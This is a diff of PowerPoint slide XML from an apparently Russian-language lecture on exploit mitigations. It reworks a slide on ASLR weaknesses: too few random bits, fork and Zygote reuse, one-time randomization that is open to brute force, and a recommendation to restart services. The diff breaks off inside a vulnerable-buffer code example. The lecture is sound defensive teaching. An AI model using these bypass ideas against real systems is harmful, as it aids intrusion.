               <a:rPr lang="ru-RU" dirty="0"/>
@@ -3956,6 +4378,35 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CAAB5B2-2B17-43DA-B986-471B96109261}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>12</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4046,6 +4497,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BEBD022-ECE3-4B8C-8D05-DE75E07E8F6E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>13</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -4160,12 +4640,8 @@
               <a:t>рандомизация </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>mmap</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>mmap)</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -4260,12 +4736,8 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>PaX</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>PaX </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -4308,6 +4780,35 @@
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DCD03CC-6146-4366-ADAC-456FE3EBD1BF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>14</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4489,15 +4990,7 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>usr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/bin/python3</a:t>
+              <a:t>/usr/bin/python3</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
@@ -4591,6 +5084,35 @@
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
             </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACEE1E84-5534-40CA-B554-DDE31DD3B079}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>15</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4788,6 +5310,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D964CB-B9F9-44B6-BBA2-69303561A6D3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>16</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -4847,6 +5398,11 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>: false negatives</a:t>
             </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (1)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -4868,13 +5424,13 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="600635" y="1550894"/>
+            <a:off x="600635" y="1866806"/>
             <a:ext cx="10753165" cy="4626069"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
+            <a:normAutofit/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -4950,252 +5506,41 @@
               <a:t>скомпрометирована</a:t>
             </a:r>
           </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Недостаточная рандомизация</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не все биты адреса одинаково случайны</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>The Illusion of Randomness</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизируется только база </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>mmap</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>адресов </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>delta_mmap</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>) =&gt; </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>относительный библиотек и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>mmap</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>регионов</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>фиксирован</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>рандомизирует порядок загрузки библиотек и промежутки между ними</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>How vulnerabilities help shape security features and mitigations in Android</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows и ранних </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Six facts about SLR on Windows</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>Stagefrightened</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>Android</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>fork </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>компрометирует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ASLR</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В частности </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Zygote-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>процесс в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId7"/>
-              </a:rPr>
-              <a:t>Choose One: Android Performance or Security</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Windows</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>В Linux рандомизация делается однократно при старте сервиса =&gt; уязвима к brute force (особенно на 32-битных платформах)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется делать регулярный рестарт сервисов</a:t>
-            </a:r>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892401D3-3909-4CB8-9F90-B8636543E11F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>17</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1248994032"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3878174193"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5227,7 +5572,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D99230-571D-42A7-BABC-A33D57B58336}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7097E2FD-8987-4F32-897D-14D61507ABB5}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5245,7 +5590,15 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Дальнейшее развитие</a:t>
+              <a:t>Недостатки</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: false negatives</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (2)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -5256,7 +5609,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD89C1A-4DA2-403E-9B2E-835D7F4790E2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64189045-44DE-49F5-92D6-619EA234B4AD}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5267,48 +5620,222 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="600635" y="1550894"/>
+            <a:ext cx="10753165" cy="4626069"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Недостаточная рандомизация</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизируется только база </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>адресов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>delta_mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>) =&gt; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>относительный библиотек и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>регионов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>фиксирован</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>рандомизирует порядок загрузки библиотек и промежутки между ними</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Небольшое число рандомизируемых битов (16 или даже 8 в 32-битных Windows и ранних </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Не все биты адреса одинаково случайны</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>fork </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>компрометирует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ASLR </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Zygote-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>процесс в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рандомизация каждого приложения делается однократно при его первой загрузке (для ускорения)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Одна и та же библиотека может грузиться по одному адресу в разных приложениях (для ускорения)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В Linux рандомизация делается однократно при старте сервиса</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Уязвима к brute force (особенно на 32-битных платформах)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется делать регулярный рестарт сервисов</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892401D3-3909-4CB8-9F90-B8636543E11F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Некоторые коммерческие решения позволяют динамически переупорядочивать сегменты в рантайме или линк-тайме</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Например </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Safe Compiler (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ИСП РАН)</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, Moving Target Defense, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Multicompiler</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>18</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3399114294"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1248994032"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5384,6 +5911,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA9DB29-A10B-4CA8-9EEA-6BEE0703D394}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>19</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -5490,21 +6046,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>char </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>local_buf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>[32];</a:t>
+              <a:t>char local_buf[32];</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -5512,46 +6054,11 @@
               <a:buNone/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>sprintf</a:t>
-            </a:r>
-            <a:r>
               <a:rPr lang="en-US" sz="1600" dirty="0">
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
